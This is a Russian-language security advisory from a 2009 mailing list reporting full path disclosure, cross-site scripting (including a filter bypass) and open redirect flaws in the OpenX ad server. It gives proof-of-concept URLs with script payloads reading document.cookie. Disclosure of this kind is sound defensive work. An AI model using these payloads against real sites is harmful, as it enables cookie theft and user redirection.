Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

MULTPLE REMOTE VULNERABILITIES --ProjectCMS v-1.1 Beta-->

“Cross-Site Scripting” vulnerability in MyBB 1.4.5

Coppermine Photo Gallery 1.4.21 Cross-Site Scripting

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	04.05.2009
Subject:	Vulnerabilities in OpenX

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Full path disclosure, Cross-Site Scripting и Redirector уязвимостях
в OpenX.

Full path disclosure:

http://site/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://site/openx/www/delivery/fc.
php?MAX_type=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

XSS (обход XSS фильтров в версии 2.6.3):

http://site/openx/www/delivery/fc.
php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Redirector:

http://site/openx/www/delivery/ck.php?dest=http://site.com

Уязвимы OpenX v2.4.9, OpenX v2.6.3 и предыдущие версии (и все версии Openads). А к Redirector
уязвимы все версии системы - OpenX v2.8.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3107/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua